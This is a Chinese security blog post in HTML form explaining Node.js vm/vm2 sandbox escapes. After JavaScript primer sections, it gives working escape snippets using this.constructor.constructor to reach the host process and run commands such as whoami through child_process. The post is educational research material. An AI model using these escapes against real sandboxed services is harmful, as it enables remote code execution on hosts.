<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.2">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/Dota_128px_1143945_easyicon.net.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"mamor5409.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":true,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
<style>
    .pace .pace-progress {
        background: #1E92FB; /*进度条颜色*/
        height: 3px;
    }
    .pace .pace-progress-inner {
         box-shadow: 0 0 10px #1E92FB, 0 0 5px     #1E92FB; /*阴影颜色*/
    }
    .pace .pace-activity {
        border-top-color: #1E92FB;    /*上边框颜色*/
        border-left-color: #1E92FB;    /*左边框颜色*/
    }
</style>

  <meta property="og:type" content="article">
<meta property="og:title" content="nodejs下vm2沙箱逃逸">
<meta property="og:url" content="http://mamor5409.github.io/posts/bfeb5984/index.html">
<meta property="og:site_name" content="Mamor&#39;s Blog">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/1.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/2.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/3.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/4.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/5.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/6.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/7.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/8.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/9.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/10.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/11.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/12.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/13.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/14.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/15.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/16.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/17.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/18.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/19.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/20.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/21.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/22.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/23.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/24.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/25.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/26.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/27.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/28.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/29.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/30.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/31.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/32.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/33.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/34.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/35.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/36.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/37.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/38.png">
<meta property="og:image" content="http://mamor5409.github.io/posts/bfeb5984/39.png">
<meta property="article:published_time" content="2023-04-20T10:03:34.000Z">
<meta property="article:modified_time" content="2023-06-07T01:08:26.100Z">
<meta property="article:author" content="Mamor">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://mamor5409.github.io/posts/bfeb5984/1.png">

<link rel="canonical" href="http://mamor5409.github.io/posts/bfeb5984/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>nodejs下vm2沙箱逃逸 | Mamor's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Mamor's Blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Mamor's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a>

  </li>
        <li class="menu-item menu-item-commonweal">

    <a href="/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>公益 404</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://mamor5409.github.io/posts/bfeb5984/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/kabi.jpg">
      <meta itemprop="name" content="Mamor">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Mamor's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          nodejs下vm2沙箱逃逸
        </h1>

        <div class="post-meta">

			
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-04-20 18:03:34" itemprop="dateCreated datePublished" datetime="2023-04-20T18:03:34+08:00">2023-04-20</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-06-07 09:08:26" itemprop="dateModified" datetime="2023-06-07T09:08:26+08:00">2023-06-07</time>
              </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>16k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>15 分钟</span>
            </span>
            <div class="post-description"> </div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>node.js  运行在服务端的JavaScript，是一个基于Chrome JavaScript运行时建立的平台，基于Google V8引擎。</p>
<p>vm2沙箱 是一个独立 的环境，主要运行一些不受信任的代码，以减轻恶意代码影响运行代码的主机的风险。虽然沙箱作为隔离机制非常有用，但是需要谨慎使用，因为 存在一些沙箱逃逸可以绕过这些限制。vm2 未处理的异步错误时不能正确地传递参数给 Error.pareStackTrace的对象（sst）造成沙箱绕过，从而造成远程代码执行</p>
<h3 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h3><p>之前没学习过js 其中es6这块也更是没听说过 所以在直接看代码的时候有比较大的困惑，后面看了下一些相关文档，主要记录几个下面会用得到的东西</p>
<h4 id="JavaScript相关"><a href="#JavaScript相关" class="headerlink" title="JavaScript相关"></a>JavaScript相关</h4><h5 id="let-var-const"><a href="#let-var-const" class="headerlink" title="let/var/const"></a>let/var/const</h5><p>let 块级作用域 函数内部使用let定义后 对函数外部无影响</p>
<p>var 定义的变量可以修改 如果不初始化会输出undefined 但不会报错</p>
<p>const 定义的变量不可修改 且必须初始化</p>
<p>es6中 const的简写</p>
<p>const {xxx} = this.state   =&gt;   const xxx = this.state.xxx</p>
<p>const {aaa,bbb,ccc} =&gt;  this const aaa = this.aaa  const bbb = this.bbb const ccc =this.ccc</p>
<p>const {aaa:A , bbb:B } = this  ？=&gt;   const A = this.aaa const B = this.B</p>
<p>async 异步操作相关关键字</p>
<p>await只能在以不含税async function内部使用</p>
<p>async函数中可能会有await表达式，如果在async函数执行时，遇到await后回显暂停执行，等触发的异步操作完成后，恢复async函数的执行并返回解析值</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">a</span>(<span class="params"></span>)&#123;  </span><br><span class="line">  <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;1&quot;</span>)  </span><br><span class="line">   <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;2&quot;</span>)</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_">a</span>()</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;3&quot;</span>)</span><br><span class="line"><span class="comment">//打印： 1 2 3 </span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">a</span>(<span class="params"></span>)&#123;  </span><br><span class="line">  <span class="keyword">await</span> <span class="number">1</span>  </span><br><span class="line">  <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;1&quot;</span>)  </span><br><span class="line">  <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;2&quot;</span>)</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_">a</span>()</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;3&quot;</span>)</span><br><span class="line"><span class="comment">//打印： 3 1 2</span></span><br></pre></td></tr></table></figure>

<h5 id="Proxy"><a href="#Proxy" class="headerlink" title="Proxy"></a>Proxy</h5><p>Proxy 是对象的包装，将代理上的操作转发到对象，并可以选择捕获其中的一些操作，可以包装任何类型的对象，包括类和函数。</p>
<p>语法： <code>let proxy = new Proxy(target, handle)</code></p>
<ul>
<li>target    要包装的对象，可以是任何东西，包括函数</li>
<li>handle    代理配置：带有”钩子”的对象  比如get钩子用于读取target属性 set钩子用于写入target属性</li>
</ul>
<p>e.g.</p>
<p>创建一个没有任何钩子的代理</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> target = &#123;&#125;;</span><br><span class="line"><span class="keyword">let</span> proxy = <span class="keyword">new</span> <span class="title class_">Proxy</span> (target,&#123;&#125;);  <span class="comment">//空的handler对象</span></span><br><span class="line">proxy.<span class="property">test</span> = <span class="number">5</span>; <span class="comment">//写入proxy对象</span></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(target.<span class="property">test</span>);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(proxy.<span class="property">test</span>);</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> key <span class="keyword">in</span> proxy) <span class="variable language_">console</span>.<span class="title function_">log</span>(key)</span><br></pre></td></tr></table></figure>

<p><img src="/posts/bfeb5984/1.png" alt="img"></p>
<p>在没有钩子情况下 所以对proxy的操作都会转发给target</p>
<ul>
<li>1.写入操作 proxy.test 会将值写入 target</li>
<li>2.读取操作 proxy.test 会从target 返回对应的值</li>
<li>3.迭代proxy 会从 target 返回对应的值2</li>
</ul>
<p>在没有任何钩子情况下，proxy是一个target的透明包装</p>
<p>target下的一些内部方法 图片来源及参考： <a target="_blank" rel="noopener" href="https://juejin.cn/post/6844904090116292616">https://juejin.cn/post/6844904090116292616</a></p>
<p><img src="/posts/bfeb5984/2.png" alt="img"></p>
<h6 id="Get钩子"><a href="#Get钩子" class="headerlink" title="Get钩子"></a>Get钩子</h6><p>参考 <a target="_blank" rel="noopener" href="https://juejin.cn/post/6844904090116292616">https://juejin.cn/post/6844904090116292616</a></p>
<p>利用proxy 中的 Get钩子 主要用于读取target 属性，当读取属性性会触发该方法</p>
<p>get(target, property, receiver)</p>
<ul>
<li>target    目标对象，该对象第一个参数传递给 new proxy</li>
<li>property    目标属性名</li>
<li>received    如果目标属性是一个getter访问器属性，则 received就是本次读取属性所在的对象。通常是proxy对象本身，可以不需要该参数</li>
</ul>
<p>使用get实现对象的默认值</p>
<p>通常情况下在nodejs获取不存在的数组项是将会得到 <code>undefined</code>，而我们将常规数组包装到代理中，以捕获读取操作 在没有此类属性的情况下返回为 <code>0</code></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> nums = [<span class="number">0</span>,<span class="number">1</span>,<span class="number">2</span>]</span><br><span class="line"></span><br><span class="line">nums = <span class="keyword">new</span> <span class="title class_">Proxy</span>(nums, &#123;</span><br><span class="line">    <span class="title function_">get</span>(<span class="params">target,prop</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span> (prop <span class="keyword">in</span> target)&#123;</span><br><span class="line">            <span class="keyword">return</span> target[prop]</span><br><span class="line">        &#125;<span class="keyword">else</span> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(nums[<span class="number">1</span>])</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(nums[<span class="number">10</span>])    </span><br></pre></td></tr></table></figure>

<p><img src="/posts/bfeb5984/3.png" alt="img"></p>
<h5 id="prepareStackTrace-自定义异常"><a href="#prepareStackTrace-自定义异常" class="headerlink" title="prepareStackTrace  自定义异常"></a>prepareStackTrace  自定义异常</h5><p>[<a target="_blank" rel="noopener" href="https://www.bookstack.cn/read/node-in-debugging/3.3ErrorStack.md#3.3.4%20Error.prepareStackTrace]">https://www.bookstack.cn/read/node-in-debugging/3.3ErrorStack.md#3.3.4%20Error.prepareStackTrace]</a>(<a target="_blank" rel="noopener" href="https://www.bookstack.cn/read/node-in-debugging/3.3ErrorStack.md#3.3.4">https://www.bookstack.cn/read/node-in-debugging/3.3ErrorStack.md#3.3.4</a> Error.prepareStackTrace)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Error.prepareStackTrace(error, structuredStackTrace)</span><br></pre></td></tr></table></figure>

<ul>
<li>第一个参数是 error对象</li>
<li>第二个参数是一个数组</li>
</ul>
<p>Error.prepareStackTrace = function (error, callSites){ }</p>
<h4 id="node-js下漏洞利用"><a href="#node-js下漏洞利用" class="headerlink" title="node.js下漏洞利用"></a>node.js下漏洞利用</h4><h4 id="child-process"><a href="#child-process" class="headerlink" title="child_process"></a>child_process</h4><p>node.js可以利用child_process模块创建子进程执行一些命令 </p>
<p>反弹shell</p>
<h3 id="VM-API"><a href="#VM-API" class="headerlink" title="VM API"></a>VM API</h3><p>以文档中的实例为例  vm运行沙箱的过程：</p>
<p>编译一段代码 -&gt; 创建一个上下文隔离对象 -&gt; 在沙箱中运行代码并返回结果 </p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> vm = <span class="built_in">require</span>(<span class="string">&#x27;vm&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> context = &#123;</span><br><span class="line">  <span class="attr">animal</span>: <span class="string">&#x27;cat&#x27;</span>,</span><br><span class="line">  <span class="attr">count</span>: <span class="number">2</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> script = <span class="keyword">new</span> vm.<span class="title class_">Script</span>(<span class="string">&#x27;count += 1; name = &quot;kitty&quot;;&#x27;</span>); <span class="comment">//编译code</span></span><br><span class="line"></span><br><span class="line">vm.<span class="title function_">createContext</span>(context); <span class="comment">// 创建一个上下文隔离对象</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">10</span>; ++i) &#123;</span><br><span class="line">  script.<span class="title function_">runInContext</span>(context); <span class="comment">// 在指定的下文里执行code并返回其结果</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(context);</span><br><span class="line"><span class="comment">// 打印: &#123; animal: &#x27;cat&#x27;, count: 12, name: &#x27;kitty&#x27; &#125;</span></span><br></pre></td></tr></table></figure>

<ul>
<li><strong>vm.createContext([sandbox])</strong></li>
</ul>
<p>在使用前需要先创建一个沙箱对象，在将沙箱对象传给该方法「如果没有则会生成一个空的沙箱对象」v8为这个沙箱对象在*<strong>当前的global外再创建一个作用域*<strong>，此时这个沙箱对象就是这个作用域中的全局对象，</strong>沙箱内部无法访问global中的属性</strong>。</p>
<ul>
<li><strong>vm.runInThisContext(code)</strong> </li>
</ul>
<p>在当前global下创建一个作用域(sandbox) 并将接收到的参数当做代码运行。在sandbox中可以访问到global中的属性，但无法访问其他包的属性</p>
<ul>
<li><strong>vm.runInNewContext(code[,sandbox][,options])</strong> </li>
</ul>
<p>createContext和runInThisContext的结合版  参数为传入要执行的代码和沙箱对象</p>
<ul>
<li><strong>vm.Script类</strong></li>
</ul>
<p>vm.Script类型的实力包含若干预编译的脚本，这些脚本能够在特定的沙箱或者上下文中被运行</p>
<ul>
<li><strong>new vm.Script(code, options)</strong> </li>
</ul>
<p>创建一个新的vm.Script对象  只编译代码但不会执行。  编译过的vm.Script之后可以多次被执行    code参数只绑定于每次执行它的对象</p>
<ul>
<li>注： 对于一些code参数的代码 一般都使用 ````反引号进行包裹</li>
<li>vm模块详细可参考以下：</li>
<li><a target="_blank" rel="noopener" href="https://nodejs.cn/api/vm.html">https://nodejs.cn/api/vm.html</a> </li>
<li><a target="_blank" rel="noopener" href="https://www.mianshigee.com/note/detail/27897wlr">https://www.mianshigee.com/note/detail/27897wlr</a></li>
</ul>
<h3 id="VM沙箱逃逸"><a href="#VM沙箱逃逸" class="headerlink" title="VM沙箱逃逸"></a>VM沙箱逃逸</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> vm = <span class="built_in">require</span>(<span class="string">&#x27;vm&#x27;</span>);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;[*]Before Escape\n&#x27;</span>)</span><br><span class="line">vm.<span class="title function_">runInNewContext</span>(<span class="string">&#x27;this.constructor.constructor(&quot;return process&quot;)().exit()&#x27;</span>);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;[*]Over Escape\n Never Execute!&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>在第三行处 vm虚拟机环境中的代码逃逸 获得了主线程的Process变量 并调用process.exit() 造成主程序非正常退出</p>
<p><img src="/posts/bfeb5984/4.png" alt="img"></p>
<p>以上代码主要使用了<code>runInNewContext</code> 函数(相当于createContext和runInThisContext) </p>
<p>其等价于如下代码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> vm = <span class="built_in">require</span>(<span class="string">&#x27;vm&#x27;</span>);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;[*]Before Escape\n&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">//初始化一个沙箱对象</span></span><br><span class="line"><span class="keyword">const</span> sandbox = &#123;&#125;;</span><br><span class="line"><span class="keyword">const</span> script = <span class="keyword">new</span> vm.<span class="title class_">Script</span>(<span class="string">&#x27;this.constructor.constructor(&quot;return process&quot;)().exit()&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> context = vm.<span class="title function_">createContext</span>(sandbox);</span><br><span class="line">script.<span class="title function_">runInContext</span>(context);</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;[*]Over Escape\n Never Execute!&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p><img src="/posts/bfeb5984/5.png" alt="img"></p>
<h3 id="VM下沙箱逃逸的利用方式"><a href="#VM下沙箱逃逸的利用方式" class="headerlink" title="VM下沙箱逃逸的利用方式"></a>VM下沙箱逃逸的利用方式</h3><p>一般沙箱逃逸后都会去尝试rce，而在Node中进行RCE就需要process  </p>
<p>在获取到process对象之后 可以通过require导入child_process，然后在利用child_process执行命令。</p>
<p>由于process挂载在global上，而通过API CreateContext创建的沙箱对象在golbal外，无法访问到global，所以想要实现rce就需要想办法将global中的Process引入到沙箱中。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> vm = <span class="built_in">require</span>(<span class="string">&quot;vm&quot;</span>);</span><br><span class="line"><span class="keyword">const</span> y1 = vm.<span class="title function_">runInNewContext</span>(<span class="string">`this.constructor.constructor(&#x27;return process.env&#x27;)()`</span>);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(y1);</span><br></pre></td></tr></table></figure>

<p><img src="/posts/bfeb5984/6.png" alt="img"></p>
<p>在上述代码中 主要通过 <code>vm.runInNewContext</code>实现逃逸来返回进程上下文环境</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vm.runInNewContext(`this.constructor.constructor(&#x27;return process.env&#x27;)()`)</span><br></pre></td></tr></table></figure>

<p>this指向的是当前传递给  <code>runInNewContext</code>的对象，这个对象不属于沙箱环境中，</p>
<p>我们通过获取这个对象获取其构造器「<code>this.constructor</code>」，再获得一个构造器对象的构造器「<code>this.constructor.constructor</code>」 ， 最后调用这个函数的构造器生成的函数，返回值为一个Process对象。</p>
<h4 id="利用toString触发"><a href="#利用toString触发" class="headerlink" title="利用toString触发"></a>利用toString触发</h4><h5 id="利用this-constructor-constructor"><a href="#利用this-constructor-constructor" class="headerlink" title="利用this.constructor.constructor"></a>利用this.constructor.constructor</h5><p>一般进行沙箱逃逸后会进行rce  在node中进行rce需要process对象，获取到process对象后，可以通过require导入child_process  在利用child_process 执行命令</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> vm = <span class="built_in">require</span>(<span class="string">&quot;vm&quot;</span>);</span><br><span class="line"><span class="keyword">const</span> y1 = vm.<span class="title function_">runInNewContext</span>(<span class="string">`this.toString.constructor(&#x27;return process&#x27;)()`</span>);</span><br><span class="line"><span class="keyword">const</span> res = y1.<span class="property">mainModule</span>.<span class="built_in">require</span>(<span class="string">&#x27;child_process&#x27;</span>).<span class="title function_">execSync</span>(<span class="string">&#x27;whoami&#x27;</span>).<span class="title function_">toString</span>()</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(res);</span><br></pre></td></tr></table></figure>

<p>然后通过返回的Process对象来RCE</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vm.runInNewContext(`this.constructor.constructor(&#x27;return process.env&#x27;)()`).mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;whoami&#x27;).toString()</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://nodejs.cn/api-v16/child_process.html#child_processexecsynccommand-options">https://nodejs.cn/api-v16/child_process.html#child_processexecsynccommand-options</a></p>
<p><img src="/posts/bfeb5984/7.png" alt="img"></p>
<h4 id="利用arguments-callee-caller"><a href="#利用arguments-callee-caller" class="headerlink" title="利用arguments.callee.caller"></a>利用arguments.callee.caller</h4><p>将上下文对象的原型链设置为nulll，并且没有其他可引用对象时，可以使用一个函数中内置对象的属性<code>arguments.callee.caller</code>，它可以返回函数的调用者.</p>
